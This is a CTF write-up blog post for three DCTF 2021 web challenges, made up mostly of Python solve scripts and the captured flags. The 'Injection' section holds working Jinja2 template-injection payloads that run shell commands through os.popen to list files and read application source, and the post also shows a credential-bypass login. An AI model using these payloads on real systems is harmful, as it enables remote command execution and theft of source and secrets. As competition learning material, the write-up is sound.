---
layout: post
date: 2021-05-17 00:00:02
title: "DCTF 2021 Write Up"
categories: CTF
tags: [SSTI, ETC]
author:
  - Jeongwon Jo

---
## (Web) Simple web [xxx pts]

```python
from pwn import *
import requests

url = "http://dctf1-chall-simple-web.westeurope.azurecontainer.io:8080/flag"
FormData = {'flag':1, 'auth': 1, 'Submit':'Submit'}
res = requests.post(url, data=FormData).text
log.info(res)
```

```
dctf{w3b_c4n_b3_fun_r1ght?}
```

---
## (Web) Injection [xxx pts]

```python
from pwn import *
import base64
import requests

# Occur SSTI Vuln in 404 page
url = 'http://dctf1-chall-injection.westeurope.azurecontainer.io:8080/'
ssti = ["{{79}}", "{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}", "{{config.__class__.__init__.__globals__['os'].popen('cat app.py').read()}}"]
string = ["Checked SSTI", "Execute ls", "Show app.py"]

log.info("Exploit")
# Stage 1
# If u look at app.py, you can see that /login is using validate_login().
for i in range(len(ssti)):
    res = requests.get(url+ssti[i]).text.replace("&#39;", "\"")
    log.info(string[i])
    log.info(" > " + res)

# Stage 2
# If u look at validate_login() in securit.py, you can know the password used by the server.
ssti = ["{{config.__class__.__init__.__globals__['os'].popen('ls lib').read()}}", "{{config.__class__.__init__.__globals__['os'].popen('cat lib/security.py').read()}}"]
string = ["Checked lib", "Show lib/security.py"]
for i in range(len(ssti)):
    res = requests.get(url + ssti[i]).text.replace("&#39;", "\"")
    log.info(string[i])
    log.info(" > " + res)

valid_password = "==QfsFjdz81cx8Fd1Bnbx8lczMXdfxGb0snZ0NGZ"
log.info(base64.b64decode(valid_password[::-1]))
```

```
dctf{4ll_us3r_1nput_1s_3v1l}
```

---
## (Web) Very secure website [200 pts]

```pytnon
from pwn import *
import requests

url = 'http://dctf1-chall-very-secure-site.westeurope.azurecontainer.io/login.php?username={}&password={}'
account = ['admin', '479763000']

res = requests.get(url.format(account[0], account[1])).text
log.info("Exploit")
log.info(res)
```

```
dctf{It's_magic._I_ain't_gotta_explain_shit.}
```

---
